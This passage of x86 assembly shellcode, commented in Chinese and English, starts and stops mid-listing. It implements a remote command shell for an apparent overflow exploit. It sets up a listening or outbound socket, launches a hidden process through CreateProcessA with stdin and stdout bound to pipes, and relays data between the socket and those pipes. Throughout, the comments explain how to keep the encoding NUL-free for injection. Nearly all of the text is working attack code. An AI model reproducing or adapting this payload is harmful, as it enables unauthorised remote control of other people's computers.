mov word ptr [ebx], ax; //SOCKADDR_IN.sin_family = AF_INET
pop eax;
;//现在寄存器状况..
;//edi --- 临时变量 sockaddr_in, (sin_family = AF_INET 被赋值)
;//edx --- 参数2 stConnectInfo 连结信息
;//eax --- 创建的管套 newsocket.
;//esi --- 参数1 SkOverflowFuncAddr 函数地址.
cmp cl,1 ;//是监听吗?
jne _IsConnectToIP; //no. 跳转.
push eax; // <-2@
;//取得端口value.
push eax; // <-1@
mov eax, [edx+stConnectInfo.dwListenPort];
call _convert_Sk_Long_To_Ansi_Word;
mov ecx, eax;
xchg ch,cl; //port = htons(port)
pop eax; // ->1@
lea ebx, [edi + SOCKADDR_IN.sin_port];
mov edx, FUNC_PARAM_2; //第2个参数.
mov word ptr [ebx], cx; //SOCKADDR_IN.sin_port = port.
xor eax, eax;
lea ebx, [edi + SOCKADDR_IN.sin_addr];
mov dword ptr [ebx], eax; //SOCKADDR_IN.sin_addr.S_un.S_addr = INADDR_ANY
pop eax; // ->2@
push eax; //<-3@
;//bind( msocket, (SOCKADDR *)&addrin, sizeof(addrin));
xor ecx, ecx;
mov cl, size sockaddr_in;
push ecx;
push edi;
push eax;
mov eax, [esi+SkOverflowFuncAddr.bind];
call eax;
;//下面的跳转,用来消去 距离太远造成的0. 对源程序没有影响的代码.
jmp _temp_1;
run_actual3_1:
jmp run_actual3_2;
_temp_1:
pop eax; //->3@
push eax; //<-4@
;//listen( msocket, 1);
xor ecx, ecx;
inc ecx;
push ecx;
push eax;
mov eax, [esi+SkOverflowFuncAddr.listen];
call eax;
pop eax; //->4@
push eax; //<-5@
;//newsocket = accept( msocket, (SOCKADDR*)&addrin, &iLen);
xor ecx, ecx;
mov cl, size sockaddr_in;
lea edi, [ebp-0c0h];
mov [edi], ecx;
push edi; //iLen = sizeof(addrin);
lea edi, [ebp-0f0h];
push edi; //&SOCKADDR_IN 结构.
push eax;
mov eax,[esi+SkOverflowFuncAddr.accept];
call eax;
pop edx; //->5@ //用来listen的socket.由eax->edx
push eax; //<-6@ //得到新的连结管套..
;//关闭 用来 listen的socket.
;//closesocket( msocket);
push edx;
mov eax, [esi+SkOverflowFuncAddr.closesocket];
call eax;
pop eax; //->6@
cmp eax, -1;
je WSocket_QuitRightNow;
jmp Finish_Get_Connection_Socket;
_IsConnectToIP: ;//连接到一个ip:port
;//addrin.sin_family = AF_INET;
;//addrin.sin_addr.S_un.S_addr = 0x0100007f;
;//addrin.sin_port = 0x8b; //139.
;//connect( socket, (SOCKADDR*)&addrin, sizeof(addrin));
;//准备参数 SOCKADDR_IN
;//现在寄存器状况..
;//edi --- 临时变量 sockaddr_in, (sin_family = AF_INET 被赋值)
;//edx --- 参数2 stConnectInfo 连结信息
;//eax --- 创建的管套 newsocket.
;//esi --- 参数1 SkOverflowFuncAddr 函数地址.
;//取得端口value.
push eax; //<-1@
mov eax, [edx+stConnectInfo.dwConnectPort];
call _convert_Sk_Long_To_Ansi_Word;
mov ecx, eax;
xchg ch,cl; //port = htons(port)
lea ebx, [edi + SOCKADDR_IN.sin_port];
mov word ptr [ebx], cx; //SOCKADDR_IN.sin_port = port.
;//下面的跳转,用来消去 距离太远造成的0. 对源程序没有影响的代码.
jmp _temp_1_1;
run_actual3_2:
jmp run_actual3;
_temp_1_1:
mov eax, [edx+stConnectInfo.dwIP1];
call _convert_Sk_Long_To_Ansi_Word;
mov ecx, eax;
shl ecx, 10h;
mov eax, [edx+stConnectInfo.dwIP2];
call _convert_Sk_Long_To_Ansi_Word;
mov cx, ax;
lea ebx, [edi + SOCKADDR_IN.sin_addr];
mov dword ptr [ebx], ecx; //SOCKADDR_IN.sin_addr.S_un.S_addr = stConnectInfo.dwIP1 + dwIP2
pop eax; //->1@
push eax; //<-2@
;//connect(msocket, addr, 0x10);
xor ecx, ecx;
mov cl, 10h;
push ecx; //sizeof(SOCKADDR_IN);
push edi; //SOCKADDR *
push eax; //msocket.
mov eax, [esi+SkOverflowFuncAddr.connect];
call eax; //connect.
mov ecx, eax;
pop eax; //->2@
jcxz Finish_Get_Connection_Socket; //connect success.
nop;
;//now, connect failure.
;//closesocket(eax)
push eax;
mov eax, [esi+SkOverflowFuncAddr.closesocket];
call eax;
xor eax, eax;
jmp WSocket_QuitRightNow;
Finish_Get_Connection_Socket:
push eax;
push eax;
pop edx; //edx = eax
;// setsockopt( newsocket, SOL_SOCKET, SO_RCVTIMEO, (LPCTSTR)&iLen, sizeof(iLen));
lea edi, [ebp-0f0h];
xor eax, eax;
mov al, 1;
mov [edi], eax;
shl eax, 2; //eax = 4
push eax;
push edi;
mov ax, SO_RCVTIMEO;
push eax;
mov ax, SOL_SOCKET;
push eax;
push edx;
mov eax, [esi+SkOverflowFuncAddr.setsockopt];
call eax;
pop eax;
WSocket_QuitRightNow:
;//返回结果.
pop ebx;
pop ecx;
pop edx;
pop edi;
pop esi;
mov esp, ebp;
pop ebp;
ret;
;// Trampoline hop: run_actual3 -> run_actual4_1 (the latter sits inside the
;// body of _Create_Process_To_Handle below).  The run_actualN labels are
;// spaced so every hop is a short (rel8) jmp; the author's own notes say a
;// jump that is "too far" would encode a 0 byte, which this shellcode must
;// avoid.  Do not move these labels or grow the code between two hops.
run_actual3:
jmp run_actual4_1;
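;//---------------------------------------------------------------------
;// _Create_Process_To_Handle( SkOverflowFuncAddr *pFuncAddr,
;//                            Shell_Cmd_Pipe *pCmdPipe, LPCTSTR pStrCmd);
;// Spawns the command line pStrCmd with its stdin/stdout/stderr redirected
;// onto the pipe ends stored in *pCmdPipe, then closes this process's
;// copies of the two child-side pipe ends.
;// In:   FUNC_PARAM_1 = pFuncAddr (table of resolved API pointers)
;//       FUNC_PARAM_2 = pCmdPipe  (holds the STARTUPINFO / PROCESS_INFORMATION
;//                                scratch areas and ShellStdinPipe/ShellStdoutPipe)
;//       FUNC_PARAM_3 = pStrCmd   (lpCommandLine for CreateProcessA)
;// Out:  nothing.  Neither DuplicateHandle nor CreateProcessA has its return
;//       value checked; the pipe handles are closed either way.
;// Clobbers: flags only -- every GP register is pushed on entry and popped
;//       in reverse on exit.
;// Shellcode constraints: all encodings are NUL-free and the run_actual4_1
;// trampoline embedded in the body keeps the jmp chain within rel8 range.
;// Any edit must keep instruction sizes unchanged (see the DuplicateHandle
;// argument fix below, which was done size-for-size).
;//---------------------------------------------------------------------
_Create_Process_To_Handle:
push ebp;
mov ebp, esp;
push edi;
push esi;
push edx;
push ecx;
push ebx;
push eax;
mov edi, FUNC_PARAM_2; //Shell_Cmd_Pipe *pCmdPipe;
push edi;
pop edx; //edx = edi = pCmdPipe
;//memset( &si, 0, sizeof(STARTUPINFO));
xor eax, eax;
lea edi, [edi +Shell_Cmd_Pipe.nstartupinfo];
push edi; //save &si; rep stosb advances edi ---
xor ecx, ecx;
mov cl, size STARTUPINFO;
rep stosb; //leaves ecx = 0
pop edi; //--- edi = &si again
;//si.cb = sizeof(STARTUPINFO);
lea esi, [edi + STARTUPINFO.cb];
mov cl, size STARTUPINFO; //ecx was 0 after rep stosb, so ecx == sizeof(STARTUPINFO)
mov [esi], ecx;
;//si.wShowWindow = SW_HIDE = 0; already zero from the memset above.
;//si.dwFlags = STARTF_USESTDHANDLES|STARTF_USESHOWWINDOW = 0x100|0x1;
lea esi, [edi + STARTUPINFO.dwFlags];
mov cx, 101h; //high word of ecx is still 0, so ecx == 0x101
mov [esi], ecx;
;//si.hStdInput = pCmdPipe->ShellStdinPipe;
push edi;
lea edi, [edi + STARTUPINFO.hStdInput];
lea esi, [edx + Shell_Cmd_Pipe.ShellStdinPipe];
mov eax, [esi];
mov [edi], eax;
pop edi;
;//si.hStdOutput = pCmdPipe->ShellStdoutPipe;
push edi;
lea edi, [edi+STARTUPINFO.hStdOutput];
lea esi, [edx+Shell_Cmd_Pipe.ShellStdoutPipe];
mov eax, [esi];
mov [edi], eax;
pop edi;
;// DuplicateHandle( GetCurrentProcess(), ShellStdoutPipe, GetCurrentProcess(),
;//                  &(si.hStdError), 0, TRUE, DUPLICATE_SAME_ACCESS );
;// Win32 order is (hSrcProc, hSrc, hTgtProc, lpTgt, dwDesiredAccess,
;// bInheritHandle, dwOptions).  The original pushed 0 / 1 / 2, which made
;// dwDesiredAccess = 2 and dwOptions = 0 -- a raw access mask rather than the
;// DUPLICATE_SAME_ACCESS the comment intended.  The three pushes below put
;// each constant in its proper slot and still assemble to 7 NUL-free bytes,
;// so trampoline distances are unchanged.
mov esi, FUNC_PARAM_1;
mov eax, [esi+SkOverflowFuncAddr.GetCurrentProcess];
call eax; //eax = pseudo-handle of this process
xor ecx, ecx;
push 2; //dwOptions = DUPLICATE_SAME_ACCESS
push 1; //bInheritHandle = TRUE (child must inherit hStdError)
push ecx; //dwDesiredAccess = 0 (ignored with DUPLICATE_SAME_ACCESS)
lea edx, [edi+STARTUPINFO.hStdError];
push edx; //lpTargetHandle = &(si.hStdError)
push eax; //hTargetProcessHandle = GetCurrentProcess()
push esi;
mov esi, FUNC_PARAM_2;
lea esi, [esi+Shell_Cmd_Pipe.ShellStdoutPipe];
mov ebx, [esi]; //ebx = ShellStdoutPipe (hSourceHandle)
pop esi;
;// Trampoline: run_actual4_1 is placed here so the run_actualN jmp chain
;// stays within short-jump range (a long jmp would encode a 0 byte).
;// The function body hops over it; it has no effect on this routine.
jmp _temp_2;
run_actual4_1:
jmp run_actual4;
_temp_2:
push ebx; //hSourceHandle = ShellStdoutPipe
push eax; //hSourceProcessHandle = GetCurrentProcess()
mov eax, [esi+SkOverflowFuncAddr.DuplicateHandle];
call eax; //result not checked
;// CreateProcessA( NULL, pStrCmd, NULL, NULL, TRUE, 0,
;//                 NULL, NULL, &si, &ProcessInformation );
;// Arguments are pushed right-to-left; eax is toggled 0 -> 1 -> 0 for the
;// TRUE in the middle because `push 0`/`push 1` immediates would not be
;// needed but `mov eax,0` would encode NUL bytes.
xor eax, eax;
mov edi, FUNC_PARAM_2;
lea edx, [edi+Shell_Cmd_Pipe.ProcessInformation];
push edx; ;//lpProcessInformation
lea edx, [edi+Shell_Cmd_Pipe.nstartupinfo];
push edx; ;//lpStartupInfo = &si
push eax; ;//lpCurrentDirectory = NULL
push eax; ;//lpEnvironment = NULL
push eax; ;//dwCreationFlags = 0
inc eax;
push eax; ;//bInheritHandles = TRUE
dec eax;
push eax; ;//lpThreadAttributes = NULL
push eax; ;//lpProcessAttributes = NULL
mov edx, FUNC_PARAM_3;
push edx; ;//lpCommandLine = pStrCmd
push eax; ;//lpApplicationName = NULL
mov eax, [esi+SkOverflowFuncAddr.CreateProcessA];
call eax; //result not checked; esi/edi survive the stdcall call
;//CloseHandle( pCmdPipe->ShellStdinPipe );  -- parent's copy of the child's stdin end
mov eax, [edi+Shell_Cmd_Pipe.ShellStdinPipe];
push eax;
mov eax, [esi+SkOverflowFuncAddr.CloseHandle];
call eax;
;//CloseHandle( pCmdPipe->ShellStdoutPipe ); -- parent's copy of the child's stdout end
mov eax, [edi+Shell_Cmd_Pipe.ShellStdoutPipe];
push eax;
mov eax, [esi+SkOverflowFuncAddr.CloseHandle];
call eax;
;// Restore every register in reverse push order; flags are the only clobber.
pop eax;
pop ebx;
pop ecx;
pop edx;
pop esi;
pop edi;
mov esp, ebp;
pop ebp;
ret;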
;// (Stale leftover comment: the STARTUPINFO memset lives inside
;//  _Create_Process_To_Handle above, nothing is zeroed here.)
;// Trampoline hop: run_actual4 -> run_actual5.  Kept within short-jump
;// (rel8) range so the jmp encodes without a 0 byte; do not grow the code
;// between this label and run_actual5.
run_actual4:
jmp run_actual5;
;//---------------------------------------------------------------------
;// _Close_All_Communication_Pipe(SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe);
;// Tears down the parent-side communication objects once the shell session
;// is finished: closesocket(pCmdPipe->msocket), then
;// CloseHandle(pCmdPipe->hReadPipe) and CloseHandle(pCmdPipe->hWritePipe).
;// In:   FUNC_PARAM_1 = pFuncAddr (table of resolved API pointers)
;//       FUNC_PARAM_2 = pCmdPipe
;// Out:  nothing.  None of the three return values is checked, and the
;//       handle/socket fields are not cleared afterwards, so a second call
;//       would re-close the same stale values.
;// Clobbers: flags only -- all GP registers are pushed on entry and popped
;//       in reverse on exit.
;// NOTE: the child-side ends (ShellStdinPipe / ShellStdoutPipe) are closed
;//       by _Create_Process_To_Handle, not here.
;// Shellcode constraint: encodings are NUL-free and the run_actual4 ->
;// run_actual5 trampoline spans this routine, so its size must stay small
;// enough for that jmp to remain a short jump.
;//---------------------------------------------------------------------
_Close_All_Communication_Pipe:
push ebp;
mov ebp, esp;
push esi;
push edi;
push edx;
push ecx;
push ebx;
push eax;
mov esi, FUNC_PARAM_1; //esi = pFuncAddr
mov edi, FUNC_PARAM_2; //edi = pCmdPipe
;//closesocket( pCmdPipe->msocket );
mov eax, [edi+Shell_Cmd_Pipe.msocket];
push eax;
mov eax, [esi+SkOverflowFuncAddr.closesocket];
call eax; //stdcall callee preserves esi/edi
;//CloseHandle( pCmdPipe->hReadPipe );
mov eax, [edi+Shell_Cmd_Pipe.hReadPipe];
push eax;
mov eax, [esi+SkOverflowFuncAddr.CloseHandle];
call eax;
;//CloseHandle( pCmdPipe->hWritePipe );
mov eax, [edi+Shell_Cmd_Pipe.hWritePipe];
push eax;
mov eax, [esi+SkOverflowFuncAddr.CloseHandle];
call eax;
;// Restore registers in reverse push order.
pop eax;
pop ebx;
pop ecx;
pop edx;
pop edi;
pop esi;
mov esp, ebp;
pop ebp;
ret;
;// Trampoline hop: run_actual5 -> run_actual6_1 (defined past the end of
;// this listing).  Part of the short-jump chain that avoids 0 bytes in
;// jmp encodings; keep the distance to run_actual6_1 within rel8 range.
run_actual5:
jmp run_actual6_1;
;//接受管套的数据,写进pipe,读pipe,发送到socket.
;//_Recv_Write_Socket_Pipe( SkOverflowFuncAddr *pFuncAddr, Shell_Cmd_Pipe *pCmdPipe);
_Recv_Write_Socket_Pipe:
push ebp;
mov ebp, esp;
xor eax, eax;
mov ax, 2f0h;
sub esp, eax; // 496bytes, use for char szTemp[240];
push esi;
push edi;
push edx;
push ecx;
push ebx;
mov esi, FUNC_PARAM_1; //SkOverflowFuncAddr *pAddr;
mov edi, FUNC_PARAM_2; //Shell_Cmd_Pipe *pCmdPipeData;
;//dwBreak = 1
lea edx, [ebp - size Recv_Write_Socket_Pipe_Data + Recv_Write_Socket_Pipe_Data.dwBreak];
xor eax, eax;
inc eax;
mov [edx], eax;
;//while(!bBreak)
_While_Read_Data_Loop:
;//监测 dwBreak == 0?
lea edx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.dwBreak];
mov eax, [edx];
test eax, eax;
jz _Quit_While_Read_Data_Loop_1;
;//iLen = recv( newsocket, szTemp, sizeof(szTemp)-1, 0);
xor eax, eax;
push eax;
mov al, SIZE_OF_TEMP_BUFFER;
push eax;
lea eax, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.szTemp];
push eax;
lea ebx, [edi+Shell_Cmd_Pipe.msocket];
mov eax, [ebx];
push eax;
mov eax, [esi+SkOverflowFuncAddr.recv];
call eax;
cmp eax, -1;
jne _NextStep_Receive_Test;
push eax;
pop edx;
mov eax, [esi+SkOverflowFuncAddr.GetLastError];
call eax;
cmp ax, 10060; //timeout?
je _Read_StdoutPipe;
_Quit_While_Read_Data_Loop_1:
jmp _Quit_While_Read_Data_Loop; //error.
_NextStep_Receive_Test:
test eax, eax; //eax == 0?
je _Quit_While_Read_Data_Loop; //break;
jng _Read_StdoutPipe;
;//Receive_Ok_Occure:
;//if( iLen > 0)
;//WriteFile( hWritePipe, szTemp, iLen, &dwTemp, NULL)
xor edx, edx;
push edx; //NULL
lea ebx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.dwTemp];
push ebx; //&dwTemp
push eax; //iLen
lea ebx, [ebp- size Recv_Write_Socket_Pipe_Data +Recv_Write_Socket_Pipe_Data.szTemp];
push ebx; //szTemp;
mov eax, [edi+Shell_Cmd_Pipe.hWritePipe];
push eax;
mov eax, [esi+SkOverflowFuncAddr.WriteFile];